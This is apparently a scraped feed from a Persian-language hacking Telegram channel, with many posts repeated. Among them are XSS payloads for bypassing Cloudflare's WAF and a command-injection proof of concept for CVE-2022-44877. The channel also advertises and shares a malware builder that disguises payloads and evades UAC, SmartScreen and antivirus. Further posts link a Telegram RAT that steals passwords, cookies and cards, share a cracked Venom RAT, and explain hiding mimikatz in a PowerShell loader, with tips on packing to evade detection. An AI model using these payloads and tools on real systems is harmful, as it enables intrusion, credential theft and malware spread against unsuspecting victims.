payloads to bypass CloudFlare WAF
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<--<img/src=%20onerror=confirm``>%20--!>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<sVg/onLy=1 onLoaD=confirm(1)//
#waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<--<img/src=%20onerror=confirm``>%20--!>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<sVg/onLy=1 onLoaD=confirm(1)//
#waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡9👍1
QuantumBuilder(@LearnExploit).rar
2.5 MB
QUANTUM BUILDER 🔥
QuantumBuilder will make your payload look like any file format (.png, .pdf, .mp4, .doc, ...), you can even disguise them as a folder.
Features:
Spoof ANY extension
300+ different icons available (Microsoft Office ones included)
UAC Bypass
Bypass Windows Smartscreen, EV certs are thing of the past
Decoy (upon opening your .lnk a file of your choosing will be displayed on your victim's pc)
Multiple payloads per .lnk file. Even if one gets detected the rest will still run
Supported payload formats: .exe/.js/.vbs/.bat
Dll payloads
99% FUD, even if you spread your stub. Every build is unique
Execute your exes with admin privileges by prompting UAC with a Microsoft signed binary (powershell.exe)
Run your payload at startup or with a delay
Hide your payloads after executing them
Melt .lnk after execution.
Choose where your payload is dropped on your victim's computer
Compress your shortcut in a .iso/.img to send it as an attachment with ease
Pass: @LearnExploit
QuantumBuilder will make your payload look like any file format (.png, .pdf, .mp4, .doc, ...), you can even disguise them as a folder.
Features:
Spoof ANY extension
300+ different icons available (Microsoft Office ones included)
UAC Bypass
Bypass Windows Smartscreen, EV certs are thing of the past
Decoy (upon opening your .lnk a file of your choosing will be displayed on your victim's pc)
Multiple payloads per .lnk file. Even if one gets detected the rest will still run
Supported payload formats: .exe/.js/.vbs/.bat
Dll payloads
99% FUD, even if you spread your stub. Every build is unique
Execute your exes with admin privileges by prompting UAC with a Microsoft signed binary (powershell.exe)
Run your payload at startup or with a delay
Hide your payloads after executing them
Melt .lnk after execution.
Choose where your payload is dropped on your victim's computer
Compress your shortcut in a .iso/.img to send it as an attachment with ease
Pass: @LearnExploit
🔥14👍3🆒2⚡1❤1👎1
ReconAIzer
A Burp Suite extension to add OpenAI (GPT) on Burp and help you with your Bug Bounty recon to discover endpoints, params, URLs, subdomains and more!
Github
#burp #ai #burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
A Burp Suite extension to add OpenAI (GPT) on Burp and help you with your Bug Bounty recon to discover endpoints, params, URLs, subdomains and more!
Github
#burp #ai #burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
👍7❤1
0Day.Today | Learn Exploit | Zero World | Dark web |
موتورهای جستجو مخصوص هکرها shodan.io hunter.io censys.io onyphe.io zoomeye.org wigle.net ghostproject.fr viz.Greynoise.io/table app.binaryedge.io fofa.so grep.app crt.sh #Pentest #Serach iliyahr —————— 0Day.Today @LearnExploit @Tech_Army
CensysGPT Beta
We can now generate censys dorks or search query to perform reconnaissance on any target.
gpt.censys.io
#OSINT #ai
——————
0Day.Today
@LearnExploit
@Tech_Army
We can now generate censys dorks or search query to perform reconnaissance on any target.
gpt.censys.io
#OSINT #ai
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9
CVE-2022-44877
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
whoami
.{{interactsh-url}}) HTTP/1.1Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
👍7❤1
خب دوستان یه چیز خیلی باحالللل یافتممم😂😂
خدایی خر ذوق شدم اگه شمام نمیدونستین براتون میگم که شمام باهاش کار کنید و عشق کنید😂❤️
ببینید یه سایتی امروز یافتم به اسم
https://beta.character.ai
خب این سایت تعداد خیلی زیادی کارکتر داخل خودش داره از کارکتر هایه انیمه ای تا کارکتر هایه تاریخی امروز با عشقم مادارا صحبت کردم😂 و پرامممم ریختتتتتت خدایییییی پرام ریخت 😂 خیلیییی خوب بود
پیشنهاد میکنم شمام تست کنید اگه تاحالا تست نکردین😂🤦♂🤦♂🤣🤣🤣
@LearnExploit
@Tech_Army
خدایی خر ذوق شدم اگه شمام نمیدونستین براتون میگم که شمام باهاش کار کنید و عشق کنید😂❤️
ببینید یه سایتی امروز یافتم به اسم
https://beta.character.ai
خب این سایت تعداد خیلی زیادی کارکتر داخل خودش داره از کارکتر هایه انیمه ای تا کارکتر هایه تاریخی امروز با عشقم مادارا صحبت کردم😂 و پرامممم ریختتتتتت خدایییییی پرام ریخت 😂 خیلیییی خوب بود
پیشنهاد میکنم شمام تست کنید اگه تاحالا تست نکردین😂🤦♂🤦♂🤣🤣🤣
@LearnExploit
@Tech_Army
character.ai
character.ai | AI Chat, Reimagined–Your Words. Your World.
Chat with millions of AI Characters on the #1 AI chat app. Where will your next adventure take you?
👍5⚡4❤1🌚1
یه توضیح درباره این متد بخوام بدم چجوری انجامش دادم یدونه process hollowing پابلیک رو اوردم و با استفاده از pe lock ابفاسکیتش کردم و برایه بخش کامپایلش dll کامپایل کردم از اونجایی هم که میشد سری هایه( net assembly.) دات نت اسمبلی رو داخل پاورشل لود کرد اونو لود کردم که برایه ارگومان دومش بایت هایه pe رو لازم داشت
در ادامه اومدم با خوندن بایت ها فایل mimikatz و اضاف کردن دو بایت به هر بخش از array اون یه جورایی به صورت اسکن تایم تونستم اونو جا بدم داخل خروجی نهایی و بعد هم با کم کردن همون دو بایت از کل array و پاس دادنش به بخش دوم ارگومان تونستم اجراش کنم ...
خب مزایایه این که تونستم با پاورشل این پروسه رو انجام بدم این هست که میشه از خروجی هایه اون خیلی جاها استفاده کرد به طور مثال ۶ سال پیش فریمورک nishang
https://github.com/samratashok/nishang/tree/master/Client
یه تعداد از خروجیی هایی که قابلیت اجرا دستورات پاورشل رو دارن رو نمایی کرد و این خب خودش باعث میشه که یکمی جذاب تر بشه
امید وارم خوشتون اومده باشه ...❤️
ساختن کریپترشو هم به زودی استارت میزنم😁👌
——————
0Day.Today
@LearnExploit
@Tech_Army
در ادامه اومدم با خوندن بایت ها فایل mimikatz و اضاف کردن دو بایت به هر بخش از array اون یه جورایی به صورت اسکن تایم تونستم اونو جا بدم داخل خروجی نهایی و بعد هم با کم کردن همون دو بایت از کل array و پاس دادنش به بخش دوم ارگومان تونستم اجراش کنم ...
خب مزایایه این که تونستم با پاورشل این پروسه رو انجام بدم این هست که میشه از خروجی هایه اون خیلی جاها استفاده کرد به طور مثال ۶ سال پیش فریمورک nishang
https://github.com/samratashok/nishang/tree/master/Client
یه تعداد از خروجیی هایی که قابلیت اجرا دستورات پاورشل رو دارن رو نمایی کرد و این خب خودش باعث میشه که یکمی جذاب تر بشه
امید وارم خوشتون اومده باشه ...❤️
ساختن کریپترشو هم به زودی استارت میزنم😁👌
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥7👎2🍾1
OnionIngestor
An extendable tool to Collect, Crawl and Monitor onion sites on tor network and index collected information on Elasticsearch
Github
#tools #onion #tor
——————
0Day.Today
@LearnExploit
@Tech_Army
An extendable tool to Collect, Crawl and Monitor onion sites on tor network and index collected information on Elasticsearch
Github
#tools #onion #tor
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6❤1⚡1
venom 6.0.1.zip
52.1 MB
خب بریم تو کار پاب کردن چندتا رت چند روز پیش که کرک ۸۸۸ رو زدم
امشبم بریم برایه ونوم اخرین ورژن
و یه نسخه اخر پگاسوس👌
ولی دونه دونه میریم جلو...❤️
یوزر نیم و پسوردش هم
h0nus:Pwn3rzs
——————
0Day.Today
@LearnExploit
@Tech_Army
امشبم بریم برایه ونوم اخرین ورژن
و یه نسخه اخر پگاسوس👌
ولی دونه دونه میریم جلو...❤️
یوزر نیم و پسوردش هم
h0nus:Pwn3rzs
——————
0Day.Today
@LearnExploit
@Tech_Army
❤10🔥2👍1
0Day.Today | Learn Exploit | Zero World | Dark web |
QuantumBuilder(@LearnExploit).rar
QuantumBuilder.rar
7.7 MB
راستی اینم تا دسته باز کردم سورسش رو تویه گروه گذاشتم گفتم اینجام بزارم اعضایه کانال استفاده کنن ولی خیلی نرسیدم تمیزش کنم
یه توضیح هم بخوام بدم در بارش طرف مثل گاو صندوق 😂 همه جاش رو رمز گذاری کرده بود دهن سرویس ولی یه تعداد فعالیت هایه غیر طبیعی هم ازش دیدم هرچند دیتکشن سند باکس داشت ولی خب بعضی جاها خیلی رفتار هایه عجیب داشت
دوست داشتید در مورد دیتکت سندباکس و vm و ... هم یه تعداد توضیحاتی براتون میزارم اینم سورس
——————
0Day.Today
@LearnExploit
@Tech_Army
یه توضیح هم بخوام بدم در بارش طرف مثل گاو صندوق 😂 همه جاش رو رمز گذاری کرده بود دهن سرویس ولی یه تعداد فعالیت هایه غیر طبیعی هم ازش دیدم هرچند دیتکشن سند باکس داشت ولی خب بعضی جاها خیلی رفتار هایه عجیب داشت
دوست داشتید در مورد دیتکت سندباکس و vm و ... هم یه تعداد توضیحاتی براتون میزارم اینم سورس
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥12👍5👎1👏1
https://github.com/LimerBoy/ToxicEye
خب اینم یه رت متصل به تل هست اموزشش هم داخل خود صفحه هست
و اینم لیست اپشناش :
ComputerInfo, BatteryInfo, Location, Whois, ActiveWindow, Webcam, Microphone, Desktop, Keylogger, ClipboardSet, ClipboardGet, ProcessList, ProcessKill, ProcessStart, TaskManagerDisable, TaskManagerEnable, MinimizeAllWindows, MaximizeAllWindows, GetPasswords, GetCreditCards, GetHistory, GetBookmarks, GetCookies, GetDesktop, GetFileZilla, GetDiscord, GetTelegram, GetSteam, OpenCD, CloseCD, DownloadFile, UploadFile, RunFile, RunFileAdmin, ListFiles, RemoveFile, RemoveDir, MoveFile, MoveDir, CopyFile, CopyDir, Speak, Shell, MessageBox, OpenURL, SendKeyPress, NetDiscover, AudioVolumeSet, AudioVolumeGet, SetWallPaper, BlockInput, Monitor(off/on), DisplayRotate, EncryptFileSystem, DecryptFileSystem,ForkBomb, BsoD, OverwriteBootSector, Shutdown, Reboot, Hibernate, Logoff, Help, About, Uninstall
واسه این که از لحاظ فیلترینگ هم مشکلی نداشته باشین میتونید ادیت کنید سورس رو ریکوست هاش رو از سمت http debugger یا هر جایه دیگه ای که میخواین ارسال کنید و اینکه یه قابلیت خوب دیگه هم که داره میتونید یه دستی رو سرش بکشید تا بایپس بشه مثلا با
Pelock .Netshrink
که اینم لینکش همه جا هم گیر میاد
https://downloadly.ir/software/programming/netshrink/
اموزش خاصی هم نمیخواد سادس کارکردن باهاش و این ابزار رویه رت هایه دیگه مثل nj و سری هایه .net هم پاسخ گو هست❤️
——————
0Day.Today
@LearnExploit
@Tech_Army
خب اینم یه رت متصل به تل هست اموزشش هم داخل خود صفحه هست
و اینم لیست اپشناش :
ComputerInfo, BatteryInfo, Location, Whois, ActiveWindow, Webcam, Microphone, Desktop, Keylogger, ClipboardSet, ClipboardGet, ProcessList, ProcessKill, ProcessStart, TaskManagerDisable, TaskManagerEnable, MinimizeAllWindows, MaximizeAllWindows, GetPasswords, GetCreditCards, GetHistory, GetBookmarks, GetCookies, GetDesktop, GetFileZilla, GetDiscord, GetTelegram, GetSteam, OpenCD, CloseCD, DownloadFile, UploadFile, RunFile, RunFileAdmin, ListFiles, RemoveFile, RemoveDir, MoveFile, MoveDir, CopyFile, CopyDir, Speak, Shell, MessageBox, OpenURL, SendKeyPress, NetDiscover, AudioVolumeSet, AudioVolumeGet, SetWallPaper, BlockInput, Monitor(off/on), DisplayRotate, EncryptFileSystem, DecryptFileSystem,ForkBomb, BsoD, OverwriteBootSector, Shutdown, Reboot, Hibernate, Logoff, Help, About, Uninstall
واسه این که از لحاظ فیلترینگ هم مشکلی نداشته باشین میتونید ادیت کنید سورس رو ریکوست هاش رو از سمت http debugger یا هر جایه دیگه ای که میخواین ارسال کنید و اینکه یه قابلیت خوب دیگه هم که داره میتونید یه دستی رو سرش بکشید تا بایپس بشه مثلا با
Pelock .Netshrink
که اینم لینکش همه جا هم گیر میاد
https://downloadly.ir/software/programming/netshrink/
اموزش خاصی هم نمیخواد سادس کارکردن باهاش و این ابزار رویه رت هایه دیگه مثل nj و سری هایه .net هم پاسخ گو هست❤️
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡9👍3❤1👏1🍾1
جدید ترین نسخه کالی 2023.2 منتشر شد .
➕ New VM image for Hyper-V - With “Enhanced Session Mode” out of the box
➕ Xfce audio stack update: enters PipeWire - Better audio for Kali’s default desktop
➕ i3 desktop overhaul - i3-gaps merged with i3
➕ Desktop updates - Easy hashing in Xfce
➕ GNOME 44 - Gnome Shell version bump
➕Icons & menus updates - New apps and icons in menu
➕ New tools - As always, various new packages added
#kali
——————
0Day.Today
@LearnExploit
@Tech_Army
➕ New VM image for Hyper-V - With “Enhanced Session Mode” out of the box
➕ Xfce audio stack update: enters PipeWire - Better audio for Kali’s default desktop
➕ i3 desktop overhaul - i3-gaps merged with i3
➕ Desktop updates - Easy hashing in Xfce
➕ GNOME 44 - Gnome Shell version bump
➕Icons & menus updates - New apps and icons in menu
➕ New tools - As always, various new packages added
#kali
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥2🍾2👍1
0Day.Today | Learn Exploit | Zero World | Dark web |
جدید ترین نسخه کالی 2023.2 منتشر شد . ➕ New VM image for Hyper-V - With “Enhanced Session Mode” out of the box ➕ Xfce audio stack update: enters PipeWire - Better audio for Kali’s default desktop ➕ i3 desktop overhaul - i3-gaps merged with i3 ➕ Desktop…
در صورتی که از کالی لینوکس قدیمی تر استفاده می کنید می تونید به صورت دستی اون رو به آخرین نسخه منتشر شده آپدیت کنید . ترمینال رو باز کنید و دستورات زیر رو وارد کنید .
——————
0Day.Today
@LearnExploit
@Tech_Army
┌──(LearnExploit㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list
[...]
┌──(LearnExploit㉿kali)-[~]
└─$ sudo apt update && sudo apt -y full-upgrade
[...]
┌──(LearnExploit㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~
[...]
┌──(LearnExploit㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] && sudo reboot -f
#kali——————
0Day.Today
@LearnExploit
@Tech_Army
🔥6👌1🆒1
در آخرین آپدیت تلگرام دسکتاپ، تمامی کاربرن میتوانند تعداد به اشتراک گذاشتن پستها را مشاهده کنند.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
👍11
Exploits + Shellcode + GHDB
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits, shellcode and papers gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away
Link
#ExploitDB
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits, shellcode and papers gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away
Link
#ExploitDB
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
🔥4👍3